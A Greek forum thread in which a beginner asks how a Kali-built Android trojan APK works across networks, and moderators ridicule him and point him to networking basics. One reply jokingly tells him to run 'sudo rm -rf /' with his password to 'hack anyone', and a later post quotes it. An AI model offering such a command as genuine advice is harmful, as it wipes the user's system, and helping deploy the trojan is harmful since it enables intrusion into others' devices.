Προς το περιεχόμενο

Kali Linux


GamerDesigner

Προτεινόμενες αναρτήσεις

Καλησπερα σας!Ειμαι καινουργιος!

θα ηθελα να σας ρωτησω κατι σχετικα με το παραπανω προγραμμα..

*Παντα για test και οχι χρηση στους αλλους*

Απλως θελω να πειραματιστω με το σχετικο προγραμμα και θελω να δοκιμασω τον τροπο με τον οποιο μπορει να χακαρει μια android συσκευη φτιαχνοντας λοιπον το αρχειο Trojan.apk και εγκατασταση στο κινητο -τρεχουμε το αρχειο-εγκατασταση-τελος

Εχουμε παρει τον ελεγχο της συσκευης του αλλα θελω να ρωτησω αυτο γινεται μονο απο την δικη μου συνδεση αν ειναι συνδεδεμενος?αν παει σε καποιο αλλο mondem και το τρεξει ειναι το ιδιο θα δουλεψει?!

 

Ευχαριστω πολυ!

*Νικος

*θελω να πειραματιστω στο συγκεκριμενο προγραμμα,κανω πειραματα μονο σε εμενα!

*Συγνωμη για τα ορθογραφικα μου λαθη!

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • Moderators

Χωρις να εχω ιδεα ποιος εισαι και τι κανεις και βλεποντας οτι αναφερεσαι στο Kali Linux σαν προγραμμα θα ελεγα να πας πισω στο δημοτικο (δημοτικο εννοω τα βασικα της πληροφορικης) και ασε το χακαρισμα κτλ για καποιον που το εχει!

 

  • Like 8
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Από το τερματικό του Kali Linux, δώσε την εντολή:

sudo rm -rf /

Θα σου ζητήσει να βάλεις τον κωδικό σου. Βάλτον και πάτα enter, μετά θα μπορείς να χακάρεις όποιον θες.

  • Like 17
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Από το τερματικό του Kali Linux, δώσε την εντολή:


Θα σου ζητήσει να βάλεις τον κωδικό σου. Βάλτον και πάτα enter, μετά θα μπορείς να χακάρεις όποιον θες.

Η καλύτερη, πιο γρήγορη και αποτελεσματική λύση.

  • Like 1
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Φιλε *Spect απλως ζητησα βοηθεια και ευχαριστω τα παιδια πολυ για τις απαντησεις τους!Θα μπορουσες κ συ να πεις την γνωμη σ και να με βοηθησεις και οχι να πετας εξυπναδες..

Κ γω σου λεω με βαση τα λεγομενα σου να αφησεις της εξυπναδες σου στο insomnia και να μην κανεις τον εξυπνο εδω...θα μπορουσες απλα να μην γραψεις στο θεμα μου κ να αφησεις καποιον αλλον να δωσει μια τελικη απαντηση!

Ευχαριστω πολυ κ παλι!Καλο σας βραδυ!

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • Moderators

Το αστείο είναι ότι το post του Spect~ είναι το πιο βοηθητικό post του thread, αλλά εσύ μάλλον θεωρείς ότι το κατέχεις και ότι ο Spect~ σου λέει εξυπνάδες...

  • Like 5
Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

  • Moderators

Φιλε *Spect απλως ζητησα βοηθεια και ευχαριστω τα παιδια πολυ για τις απαντησεις τους!Θα μπορουσες κ συ να πεις την γνωμη σ και να με βοηθησεις και οχι να πετας εξυπναδες..

Κ γω σου λεω με βαση τα λεγομενα σου να αφησεις της εξυπναδες σου στο insomnia και να μην κανεις τον εξυπνο εδω...θα μπορουσες απλα να μην γραψεις στο θεμα μου κ να αφησεις καποιον αλλον να δωσει μια τελικη απαντηση!

Ευχαριστω πολυ κ παλι!Καλο σας βραδυ!

Για να θεωρεις τις απαντησεις των παιδιων  χρησιμες δειχνεις για αλλη μια φορα την αγνοια σου στον συγκεκριμενο τομεα. Δοκιμασες αυτο που σου ειπε ο Haldol?

 

Δεν το παιζω ουτε εξυπνος ουτε τιποτα απλα προσπαθω να σου δειξω οτι το χεις παει σε πολυ λαθος δρομο και οτι αν θες πραγματικα να κανεις αυτο το πραγμα θα πρεπει να ξεκινησεις απο την αρχη. Μαθε πρωτα OSI model/TCP IP να τα παιζεις στα δαχτυλα μαθε και προγραμματισμο και μετα συζηταμε ξανα για ποιον θα χακαρεις και πως

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Επισκέπτης
Αυτό το θέμα είναι πλέον κλειστό για περαιτέρω απαντήσεις.
  • Δημιουργία νέου...